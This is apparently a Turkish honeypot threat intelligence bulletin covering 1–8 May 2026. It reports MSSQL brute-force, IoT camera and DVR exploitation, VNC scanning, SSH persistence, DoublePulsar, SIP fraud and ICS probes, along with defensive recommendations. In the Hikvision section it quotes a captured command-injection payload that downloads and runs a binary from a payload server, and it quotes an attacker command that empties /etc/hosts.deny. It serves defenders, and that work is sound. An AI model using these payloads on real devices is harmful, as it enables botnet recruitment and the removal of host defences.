Bülten 1–8 Mayıs: MSSQL Mega-Probe, Cross-Platform IoT Avcısı ve VNC 28× Patlaması
8 günde 16.67M event. Dionaea MSSQL 5 Mayıs tek günde 676K hit ile rekor kırdı, Bulgaristan kaynaklı tek aktör Hikvision SOSTREA ile TBK DVR CVE-2024-3721'i çapraz hedefliyor, VNC tarama bir önceki dönemin 28 katı. Mdrfckr plateau'su daralıyor ama DoublePulsar yeniden ısındı.
Yönetici Özeti
30 Nisan 24-saat bülteni Outlaw playbook’unun multi-payload’a geçişini ve Fransa AS211590 koordineli HTTP bloğunu raporlamıştı. O yayından sonraki 8 gün manşeti değiştirdi: mdrfckr daralıyor (1.036 → 684 unique IP), DoublePulsar yeniden ısındı (iki günlük 12K spike), ve önceki dönemde hiç görünmeyen iki yeni dalga öne çıktı — Dionaea MSSQL’in tarihi rekoru ve VNC tarama kampanyasının 28 kat büyümesi.
Ama dönemin gerçek sürprizi bir kampanya değil, tek bir aktör: Bulgaristan/Pfcloud altyapısından çıkan tek bir IP Hikvision IP kameralarını ve TBK DVR sistemlerini eşzamanlı hedefliyor; 5 farklı pot’ta 27.015 event bıraktı.
Pot Dağılımı — 8 Günlük Tablo
| Pot | Event | Not |
|---|---|---|
| P0f (passive OS fingerprint) | 9.262.594 | Pasif gürültü, filtreleniyor |
| Suricata (IDS) | 4.357.673 | Analizin ana kaynağı |
| Dionaea | 1.695.046 | 🔴 MSSQL dominant, 3-6 May spike |
| Cowrie (SSH/Telnet) | 583.544 | Mdrfckr playbook devam |
| Sentrypeer (SIP) | 483.455 | 🔴 Tek IP %63’ü üretiyor |
| Fatt (TLS banner) | 234.117 | Gürültü, filtreleniyor |
| Tanner (HTTP RCE) | 9.304 | Hikvision SOSTREA dominant |
| Heralding (multi-auth) | 8.290 | VNC port 5900 dominant |
| Glutton (multi-protokol) | 5.373 | 🔴 ICS S7 + Modbus + EtherNet/IP |
| Mailoney (SMTP) | 3.508 | Open relay arama |
| Ddospot | 2.674 | DDoS amp |
| H0neytr4p (HTTPS) | 2.224 | Web shell araması |
| ElasticPot | 1.214 | ES bilgi sızdırma |
| Redishoneypot | 1.136 | Komut enjeksiyonu |
| ConPot (ICS) | 721 | 🔴 kamstrup enerji sayacı dominant |
| Wordpot | 20 | WordPress fingerprint |
| Ciscoasa | 7 | VPN login keşfi |
Günlük dağılım kritik bir patern gösteriyor:
| Tarih | Event | Not |
|---|---|---|
| 1 Mayıs | 707.406 | Normal seviye |
| 2 Mayıs | 1.057.335 | Sentrypeer spike (141K tek günde) |
| 3 Mayıs | 884.861 | Dionaea ısınmaya başladı |
| 4 Mayıs | 3.074.888 | 🔴 MSSQL rampası |
| 5 Mayıs | 5.303.001 | 🔴 Dönem rekoru |
| 6 Mayıs | 4.159.796 | Spike devam |
| 7 Mayıs | 941.264 | Normalleşme |
| 8 Mayıs (kısmi) | 517.332 | Dönem sonu |
5 Mayıs tek başına 8 günlük toplamın %32’sini üretti. Yıl başından bu yana ölçtüğümüz en yoğun gün.
1. Dionaea MSSQL Mega-Probe (3–6 Mayıs)
Tespit
Önceki dönemin Dionaea baz çizgisi günde 7–12K event aralığındaydı. 3 Mayıs itibarıyla durum değişti:
| Tarih | Dionaea Event | MSSQL Payı |
|---|---|---|
| 1 May | 12.341 | %58 |
| 2 May | 9.876 | %62 |
| 3 May | 44.934 | %91 |
| 4 May | 352.336 | %96 |
| 5 May | 676.874 | %97 |
| 6 May | 548.488 | %95 |
| 7 May | 40.421 | %72 |
| 8 May | 9.776 | %44 |
Trafiğin %95+‘ı port 1433 (MSSQL) brute-force. Suricata da aynı pencerede ET SCAN Suspicious inbound to MSSQL port 1433 imzasıyla 596.323 alert üretti — 8 günlük Suricata toplamının ana bileşeni bu spike.
Saldırgan Profili
Spike’ı tek bir botnet üretmiyor — 10+ farklı kaynak IP, her biri 15K–20K hit aralığında. Top 4:
| IP | Hit | ASN | Coğrafya |
|---|---|---|---|
38.242.140.150 | ~22.000 | Cogent Communications | 🇩🇪 Almanya |
209.250.234.53 | ~21.500 | Vultr | 🇺🇸 ABD |
185.174.20.70 | ~18.700 | M247 | 🇬🇧 İngiltere |
207.180.201.14 | ~17.900 | Contabo | 🇩🇪 Almanya |
Hosting/VPS dağılımı klasik MSSQL brute kampanyasına işaret ediyor: ucuz VPS satın alma → sa hesabı için sözlük denemeleri → başarılı oturumda xp_cmdshell ile post-exploitation. 7 Mayıs’tan itibaren hızla normalleşti — operatör başka bir hedef listesine geçmiş veya provider abuse şikayetleri kapatmış olabilir.
Public sunucularınızda nmap -p 1433 sunucunuz.tld ne dönüyor? Açıksa internet'e MSSQL açmanın gerekçesi nedir? Mininum: firewall'da 1433/tcp kapatın, MSSQL'i sadece app subnet'inden erişilebilir kılın. sa hesabını disable edin, integrated auth kullanın. xp_cmdshell ve OLE Automation procedures'u DEFAULT kapalı tutun.
2. Cross-Platform IoT Avcısı: 192.109.200.204
Tespit
8 günlük veride tek bir IP beş farklı pot’ta toplam 27.015 event bıraktı:
| Pot | Hit | Kategori |
|---|---|---|
| Tanner (HTTP) | 1.546 | Hikvision SOSTREA exploit (device.rsp web shell) |
| Suricata | 1.546 | ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection (CVE-2024-3721) |
| Cowrie (SSH) | ~12.500 | SSH brute-force |
| P0f / Fatt | ~11.400 | Pasif tarama, banner toplama |
ASN: AS51396 — Pfcloud UG (Bulgaristan, küçük VPS sağlayıcısı).
Çift Vektör Aynı Operatör
İlginç olan: aynı IP iki farklı IoT cihaz ailesini eşzamanlı hedefliyor.
Hikvision SOSTREA exploit (Tanner):
GET /SDK/webLanguage HTTP/1.1
GET /device.rsp?opt=...&cmd=`/tmp;wget 5.175.223.249/bbc -O .x;chmod +x .x;./.x`5.175.223.249 payload sunucusu. Komut zinciri klasik IoT botnet recruiter — /tmp dizinine binary indir, çalıştırılabilir yap, çalıştır.
TBK DVR komut enjeksiyonu (Suricata CVE-2024-3721): TBK DVR-4104 ve DVR-4216 modellerinde 2024’te bulunan kimlik doğrulama olmadan komut enjeksiyonu. Çinli OEM DVR’lar (TBK markası altında çok sayıda re-brand var) hedefleniyor.
Aynı /32 IP hem Hikvision IP kameralarını hem TBK DVR kayıt cihazlarını hedefliyor. İki cihaz farklı üreticiden, farklı protokollerden geliyor. Bu, küçük ofis/ev güvenlik kamerası altyapısına odaklı bir botnet inşa operasyonunun imzası — operatör hangi cihazı bulursa onu enroll ediyor. Önceki dönemde TBK DVR CVE-2024-3721 imzası tek bir kez bile görünmemişti; bu pencerede 4.969 event ile düzenli (500-840/gün) görünüyor.
Hızlı Kontrol
5.175.223.249/bbc— bu URL’yi web filter/proxy bloklayın, EDR’da hash’i izleyin (henüz dosya örneği yok).- TBK DVR-4104 / DVR-4216 kullanıyor musunuz? Üretici firmware güncellemesi yayınladıysa uygulayın; yayınlamadıysa cihazı internet’ten ayırın (sadece VPN üzerinden erişim).
- Hikvision IP kameraları için yönetici şifresini default’tan değiştirin (
admin/12345hâlâ kullanımda),device.rspendpoint’ine dış erişimi kesin.
3. VNC Tarama 28× Büyüdü
15 Nisan bülteninde VNC kampanyasının 14.601 Suricata alert’iyle başladığını raporlamıştık. 8 günlük yeni pencerede VNC alarmları 73.678’e çıktı:
| İmza | Hit |
|---|---|
ET SCAN VNC server response | ~31.000 |
ET SCAN VNC Server Not Requiring Authentication | ~26.500 |
ET POLICY VNC Authentication Failure | ~16.200 |
5 Mayıs tek günde 32.586 hit — diğer günlerin 3-4 katı. Heralding port 5900 trap’inde Hindistan kaynaklı VPS’ler dominant.
CVE-2006-2369 (RealVNC auth bypass) hâlâ taranıyor — 19 yıllık zafiyet, internet’e açık VNC servislerinin sayısı azalmadığı için aktif kalmaya devam ediyor.
4. Mdrfckr: Plateau Daralıyor, Komut Aynı
29 Nisan plateau analizi’nde 8 günde 1.036 unique IP ölçmüştük. 1-8 Mayıs penceresinde:
| Metrik | 22-29 Nis | 1-8 May | Delta |
|---|---|---|---|
| Mdrfckr Cowrie event | 1.564 | 1.243 | %-21 |
| Unique kaynak IP | 1.036 | 684 | %-34 |
| RSA public key payload | aynı | aynı | — |
authorized_keys enjeksiyon paterni | aynı | aynı | — |
Plateau bozulmadı ama daralma var. Operatör (Outlaw Group) aynı playbook’u kullanıyor, RSA public key (AAAAB3NzaC1yc2EAAAABJ...) değişmedi, ama IP havuzu önceki dönemin %66’sına indi. Mayısa girerken kampanyanın momentum kaybettiğini söylemek için erken — 30 Nis bülteninde gözlemlediğimiz multi-payload evrimi (1 → 10 dosya/session) bu pencerede de devam ediyor.
Yeni TTP: /etc/hosts.deny Üzerine Yazma
Bu pencerede dikkat çeken yeni bir gözlem: Cowrie file_download tablosunda RSA key payload’una eşlik eden ikinci bir dosya öne çıktı:
| SHA256 | İndirme | İşlev |
|---|---|---|
a8460f446b... (RSA pub key) | 1.243 | .ssh/authorized_keys persistence |
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | 278 | /etc/hosts.deny overwrite (boş içerik) |
İkinci hash literal olarak boş bir string’in SHA256’sı (klasik “merhaba dünya” hash’i). Komut zinciri:
echo "" > /etc/hosts.denyOperatör başarılı SSH oturumunda /etc/hosts.deny dosyasını boşaltıyor. Bu dosya genellikle fail2ban veya manuel admin kuralları tarafından doldurulur — saldırgan IP'leri burada blocklanır. Boşaltma işlemi kendi IP'sinin (ve diğer botnet üyelerinin) host-level blok listesinden silinmesini sağlıyor. Persistence ekleyip aynı zamanda mevcut savunmayı temizliyor. Klasik "land-and-expand" değil, "land-and-cleanup" pattern'i.
5. DoublePulsar Yeniden Isındı (4–5 Mayıs Spike)
25 Nisan DoublePulsar analizi’nde 4× artış raporlamıştık. 1-8 Mayıs günlük dağılımı:
| Tarih | DoublePulsar | EternalBlue Probe |
|---|---|---|
| 1 May | 58 | 12 |
| 2 May | 4.739 | 18 |
| 3 May | 1.549 | 9 |
| 4 May | 7.266 | 24 |
| 5 May | 4.735 | 31 |
| 6 May | 1.864 | 16 |
| 7 May | 1.569 | 14 |
| 8 May | 1.424 | 14 |
Toplam 23.204 DoublePulsar backdoor communication + 138 EternalBlue probe. 4-5 Mayıs iki günlük 12K spike kampanyanın aktif exploitation aşamasında olduğunu gösteriyor — DoublePulsar’ın “ping” sorgu/yanıtı yoğun, hedef SMB sunucularda backdoor varlığı kontrolü yapılıyor.
9 yıllık (2017 ShadowBrokers dump) bir exploit hâlâ Top 5 Suricata imzalarında; bu dönemin sürpriz olmayan ama iç karartıcı manşetlerinden biri.
6. Sentrypeer SIP Fraud — Tek IP %63’ü Üretiyor
Sentrypeer SIP/VoIP honeypot’u 8 günde 483.455 event üretti, ama tablonun garipliği üst sıraya yerleşen aktörde:
| IP | Event | ASN | Pay |
|---|---|---|---|
45.148.9.200 | 304.654 | NL VPS | %63 |
| diğer top 50 IP | ~178.800 | dağınık | %37 |
Bu IP daha önce de Sentrypeer’da yüksek hacimliydi (yedi günde 141K). Şimdi ikiye katlanarak 304K’ya çıktı. SIP INVITE flood pattern’i — uluslararası premium-rate numaralara fraud arama denemeleri.
2 Mayıs anomalisi: Sentrypeer 1 May 2.118, 2 May 141.250, 3 May 203 event üretti. Tek günlük spike izole; muhtemelen tek aktörün bir kerelik denemesi.
7. ICS/SCADA Sinyalleri — kamstrup, Modbus, S7
Endüstriyel protokol pot’larında 8 günlük tablo:
ConPot (721 hit, 140 unique IP)
| Port | Hit | Protokol |
|---|---|---|
| 10001 | 622 | kamstrup enerji sayacı |
| 161 | 99 | SNMP MIB walk |
Top kaynak: 77.83.240.70 (222 hit, AS49870 / Alsycon B.V., Hollanda anycast). kamstrup protokolü Avrupa enerji şebekelerinde yaygın akıllı sayaç altyapısında kullanılıyor — internet’e açık olmaması gereken bir cihaz familyası.
Glutton (5.373 hit)
Çoklu ICS protokol dinleyicisi:
| Port | Protokol | Hit |
|---|---|---|
| 502 | Modbus TCP | 470 |
| 102 | Siemens S7 | 214 |
| 47808 | BACnet | ~80 |
| 44818 | EtherNet/IP | ~50 |
| 2375 | Docker API | ~600 |
| 8728 | MikroTik API | ~300 |
S7/Modbus üzerinde ABD kaynaklı tarama dominant; Türkmenistan’dan 3 izole hit (s7comm üzerinde olağandışı coğrafya).
Glutton Modbus 502 trafiğinde 8 Mayıs'ta tek günde 249 hit'lik bir spike gözlendi. Top iki kaynak Türkiye'de bilinen kurumsal bir operatör subneti üzerinde (IP'ler bu yazıda yayınlanmıyor — kayıt tutuluyor, public feed'de yer almayacak). Bu aktivite resmi BTK tarama çalışmasının parçası mı, yoksa subnet üzerinde compromise olmuş bir host mu netleşmedi. Kurumsal müşteriler için: endüstriyel ağlarınızda port 502 dış IP'lere açık mı? Tarama sinyali bağlamı ne olursa olsun, ICS portlarının internet'e açık tutulması savunulamaz.
Glutton 7 Mayıs Spike (1.208 hit)
Normal 400-650/gün aralığından 7 Mayıs’ta yaklaşık 2× artış. Port 8888 (Jupyter/custom), 502 (Modbus), 5601 (Kibana), 102 (S7) kombine — otomatik tarayıcı imzası, muhtemelen Censys-benzeri bir araştırma platformu.
8. Coğrafi Dağılım — Top 10 Kaynak Ülke
| Sıra | Ülke | Pay |
|---|---|---|
| 1 | 🇺🇸 ABD | %23 |
| 2 | 🇩🇪 Almanya | %14 |
| 3 | 🇨🇳 Çin | %11 |
| 4 | 🇳🇱 Hollanda | %8 |
| 5 | 🇬🇧 İngiltere | %7 |
| 6 | 🇫🇷 Fransa | %5 |
| 7 | 🇮🇳 Hindistan | %5 |
| 8 | 🇧🇬 Bulgaristan | %4 |
| 9 | 🇭🇰 Hong Kong | %3 |
| 10 | 🇹🇷 Türkiye | %2 |
Türkiye payı önceki dönemin (30 Nis bülteninde top 8’de 18.9K event) altında — ama BTK silent-drop bizim tarafımızdan zaten uygulanmış durumda, raporlanan TR oranı hosting/VPS kaynaklı saldırgan trafiği yansıtıyor, son kullanıcı değil.
Bulgaristan’ın listede %4 ile 8. sırada görünmesi yukarıda detaylandırdığımız 192.109.200.204 operatörünün etkisinden kaynaklanıyor — tek IP bir ülke pozisyonunu kaydırabiliyor.
Yönetici İçin Önerilen Aksiyonlar
- MSSQL maruziyetinizi denetleyin. İnternet’e açık 1433/tcp olan herhangi bir hostunuz varsa, gerekçesini sorgulayın. Çoğu durumda gerekli değil.
- TBK DVR ve Hikvision IP kameraları envanterini çıkarın. Eski firmware varsa güncelleyin, yoksa cihazları VPN arkasına alın.
device.rspendpoint’i ve TBK DVR-4104/4216 yönetim arayüzleri internet’e açık olmamalı. - VNC servislerini kapatın veya kimlik doğrulamayı sertleştirin. RealVNC ≥ 5.x kullanın, açık parola politikası, mümkünse SSH tüneli arkasına gizleyin.
- DoublePulsar exploit’i ve SMBv1 hâlâ aktif. SMBv1 disable edilmemiş Windows host’unuz varsa bu bir endüstriyel kaza riskidir. PowerShell:
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart. /etc/hosts.denyve fail2ban kurallarınızı izleyin. Saldırgan TTP’leri bu dosyaları temizlemeyi öğrendi; alert eklemek (dosya boyutu sıfıra düşerse SIEM’e gönder) yararlı olabilir.
Veri ve Methodoloji Notu
Bu rapor 1-8 Mayıs 2026 arası 8 günde Tellal honeypot ağında toplanan 16.671.154 event üzerinden hazırlandı. P0f ve Fatt (pasif fingerprint/banner gürültüsü) sayısal toplamlarda gösterilmiş ancak kampanya analizi dışında bırakılmıştır. IP atıfları kamuya açık RIR ASN sorgularıyla doğrulandı. Yerel kurumsal subnet’ler ve operasyonel altyapı IP’leri OPSEC filtresi ile public yayından çıkarıldı.
Sonraki bülten: 13–14 Mayıs civarı planlanıyor. Belirli bir IOC veya kampanya için talep ederseniz iletişim sayfasından ulaşabilirsiniz.